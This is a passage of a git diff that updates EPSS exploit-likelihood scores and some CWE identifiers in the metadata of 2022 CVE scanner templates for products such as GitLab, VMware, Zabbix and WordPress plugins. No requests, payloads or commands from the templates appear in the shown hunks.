0.98788 + epss-score: 0.92824 + epss-percentile: 0.98712 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 048c69ae56..ae09b5a47a 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-21705 cwe-id: CWE-74 - epss-score: 0.00519 - epss-percentile: 0.73816 + epss-score: 0.00522 + epss-percentile: 0.74194 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 @@ -111,4 +111,4 @@ http: internal: true part: body -# Obtain current theme used for Markup editor of OctoberCMS \ No newline at end of file +# Obtain current theme used for Markup editor of OctoberCMS diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index db5670c3c9..4eae03321e 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-2185 cwe-id: CWE-78 - epss-score: 0.46606 - epss-percentile: 0.96958 + epss-score: 0.50495 + epss-percentile: 0.97142 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 4e916d3801..a5005234c5 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2187 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45304 + epss-percentile: 0.45683 cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 8e57244cbe..a38cba1591 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-2219 cwe-id: CWE-79 epss-score: 0.00179 - epss-percentile: 0.5437 + epss-percentile: 0.54804 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 17579eeb58..19d0123535 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-22242 cwe-id: CWE-79 - epss-score: 0.40304 - epss-percentile: 0.96776 + epss-score: 0.04894 + epss-percentile: 0.91873 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 53a4145fb1..3d3658a8c4 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - epss-score: 0.96538 - epss-percentile: 0.99422 + epss-score: 0.9584 + epss-percentile: 0.99245 cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index a9015b5aaf..61b6c760f9 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.28675 - epss-percentile: 0.96259 + epss-score: 0.22291 + epss-percentile: 0.95918 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index d2212c7c05..fe86e1d76e 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22897 cwe-id: CWE-89 - epss-score: 0.03722 - epss-percentile: 0.90593 + epss-score: 0.04685 + epss-percentile: 0.91688 cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index f29466e7d7..d7e3135825 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2290 cwe-id: CWE-79 epss-score: 0.00112 - epss-percentile: 0.43971 + epss-percentile: 0.44337 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index cbb5a88115..dd8f54b55e 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 - epss-score: 0.9754 - epss-percentile: 0.99989 + epss-score: 0.97519 + epss-percentile: 0.99983 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index c4e8f54676..6e0cf1f154 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22954 cwe-id: CWE-94 - epss-score: 0.97532 - epss-percentile: 0.99985 + epss-score: 0.97369 + epss-percentile: 0.99863 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 1d438a0a73..b84d420a65 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22963 - cwe-id: CWE-917,CWE-94 - epss-score: 0.97452 - epss-percentile: 0.99924 + cwe-id: CWE-94,CWE-917 + epss-score: 0.97508 + epss-percentile: 0.99978 cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index f3774b4f4c..bb5d832b01 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 - epss-score: 0.97502 - epss-percentile: 0.99964 + epss-score: 0.97484 + epss-percentile: 0.99962 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index cfa3852e40..65a0ec1f43 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 - epss-score: 0.78281 - epss-percentile: 0.97824 + epss-score: 0.78078 + epss-percentile: 0.97871 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 4692313914..06e3c0486b 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23102 cwe-id: CWE-601 - epss-score: 0.00434 - epss-percentile: 0.71407 + epss-score: 0.00366 + epss-percentile: 0.69274 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index eaf7c2822e..7e7dc8508c 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23131 cwe-id: CWE-290 - epss-score: 0.97044 - epss-percentile: 0.99643 + epss-score: 0.96928 + epss-percentile: 0.9962 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 402f8807cb..84345cc7bb 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 - epss-score: 0.48649 - epss-percentile: 0.97026 + epss-score: 0.26637 + epss-percentile: 0.962 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 296bcc3d26..c84aebb448 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2314 - cwe-id: CWE-94 - epss-score: 0.1914 - epss-percentile: 0.95605 + cwe-id: CWE-78,NVD-CWE-noinfo + epss-score: 0.1981 + epss-percentile: 0.95729 cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index b196ae35df..5a50918804 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 - epss-percentile: 0.89951 + epss-percentile: 0.90104 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 83cdd176d5..f42a67938a 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23347 cwe-id: CWE-22 - epss-score: 0.10291 - epss-percentile: 0.94201 + epss-score: 0.14821 + epss-percentile: 0.95158 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 370f1de15c..cd4278e68d 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23348 cwe-id: CWE-916 - epss-score: 0.00323 - epss-percentile: 0.66903 + epss-score: 0.00425 + epss-percentile: 0.71398 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 1709e05715..86280b72b8 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 epss-score: 0.00059 - epss-percentile: 0.22776 + epss-percentile: 0.23134 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index cae9b857de..6c7a317666 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 - epss-score: 0.00401 - epss-percentile: 0.70313 + epss-score: 0.00399 + epss-percentile: 0.70587 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 95afd1f267..dab5c01f7c 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - epss-score: 0.0701 - epss-percentile: 0.93088 + epss-score: 0.04933 + epss-percentile: 0.91905 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index c3f6073e16..2017f0d704 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23779 cwe-id: CWE-200 - epss-score: 0.0089 - epss-percentile: 0.80566 + epss-score: 0.01253 + epss-percentile: 0.84022 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index b39a068ea8..54f4bbe4e2 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2379 cwe-id: CWE-862 - epss-score: 0.02717 - epss-percentile: 0.89157 + epss-score: 0.01934 + epss-percentile: 0.87301 cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 808bd3a1a3..bf77c6eb77 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 - epss-score: 0.00238 - epss-percentile: 0.6117 + epss-score: 0.00161 + epss-percentile: 0.52445 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index fe241269dd..1bc2e020a3 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39802 + epss-score: 0.00119 + epss-percentile: 0.45683 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index b65c68a673..d8350a03d2 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23854 cwe-id: CWE-22,CWE-23 - epss-score: 0.88121 - epss-percentile: 0.98247 + epss-score: 0.85553 + epss-percentile: 0.98158 cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 32f58f778b..b80f5171e4 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23881 cwe-id: CWE-77 - epss-score: 0.29422 - epss-percentile: 0.96308 + epss-score: 0.21069 + epss-percentile: 0.95829 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 0b6a1d6af4..c42cef51b4 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23898 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.81996 + epss-score: 0.01192 + epss-percentile: 0.83572 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index 0cc39f59aa..0beeb6cce8 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-23944 cwe-id: CWE-306,CWE-862 - epss-score: 0.65738 - epss-percentile: 0.97456 + epss-score: 0.72718 + epss-percentile: 0.97723 cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 9ff9a9f865..82868d79bb 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 - epss-score: 0.97343 - epss-percentile: 0.99829 + epss-score: 0.97257 + epss-percentile: 0.99786 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 8e8b600d83..d632a90aa9 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24124 cwe-id: CWE-89 - epss-score: 0.00846 - epss-percentile: 0.80026 + epss-score: 0.01169 + epss-percentile: 0.83388 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index 1cb0fc4801..55ed645979 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24129 cwe-id: CWE-918 epss-score: 0.00647 - epss-percentile: 0.76687 + epss-percentile: 0.76954 cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 3076575232..f7c6f5681e 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2414 cwe-id: CWE-611 - epss-score: 0.01359 - epss-percentile: 0.84532 + epss-score: 0.0163 + epss-percentile: 0.86066 cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 6f5a3c0647..52f56d89cc 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24181 cwe-id: CWE-79 - epss-score: 0.00131 - epss-percentile: 0.47237 + epss-score: 0.00168 + epss-percentile: 0.53267 cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 829db2e4bf..f983183710 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-24223 cwe-id: CWE-89 epss-score: 0.00656 - epss-percentile: 0.7689 + epss-percentile: 0.77139 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 9d735a922c..8f8f08c8f5 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 - epss-score: 0.39803 - epss-percentile: 0.96763 + epss-score: 0.35009 + epss-percentile: 0.96613 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 15a54ebdee..cc2138aad6 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.06436 - epss-percentile: 0.9277 + epss-score: 0.06646 + epss-percentile: 0.92996 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 6346c2428a..edb5140200 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24265 cwe-id: CWE-89 - epss-score: 0.06436 - epss-percentile: 0.9277 + epss-score: 0.06646 + epss-percentile: 0.92996 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 20fa124c69..666e279817 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.04372 - epss-percentile: 0.91286 + epss-score: 0.04519 + epss-percentile: 0.91524 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 739b46bcdb..bbdd6d055d 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-24288 cwe-id: CWE-78 - epss-score: 0.88109 - epss-percentile: 0.98246 + epss-score: 0.90435 + epss-percentile: 0.98454 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index b91a179cef..a60394651a 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24384 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.45411 + epss-score: 0.00084 + epss-percentile: 0.35036 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 140b5e988e..1d360a7057 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.00881 - epss-percentile: 0.80428 + epss-score: 0.01386 + epss-percentile: 0.84839 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 2085cd680e..0865c19e07 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2467 cwe-id: CWE-89 - epss-score: 0.01423 - epss-percentile: 0.84857 + epss-score: 0.01454 + epss-percentile: 0.85179 cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 0bdac27064..14c9b270ad 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24681 cwe-id: CWE-79 - epss-score: 0.0017 - epss-percentile: 0.53409 + epss-score: 0.00153 + epss-percentile: 0.51214 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index b3da1f1325..703c68601e 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24716 cwe-id: CWE-22 - epss-score: 0.33311 - epss-percentile: 0.96475 + epss-score: 0.21075 + epss-percentile: 0.9583 cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index ca453a3fb0..93ab03a7de 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24816 cwe-id: CWE-94 - epss-score: 0.87795 - epss-percentile: 0.98227 + epss-score: 0.87558 + epss-percentile: 0.98281 cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 41a8453ddb..5b48dce0e4 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 - epss-score: 0.04747 - epss-percentile: 0.91616 + epss-score: 0.07931 + epss-percentile: 0.93515 cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index c264ef9908..c9599e82c5 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2486 cwe-id: CWE-78 - epss-score: 0.97265 - epss-percentile: 0.99771 + epss-score: 0.97235 + epss-percentile: 0.99773 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index dd1b572bee..ef43c4f12b 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.9737 - epss-percentile: 0.99849 + epss-score: 0.97371 + epss-percentile: 0.99867 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index d4ea79ae06..e9af164e98 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2488 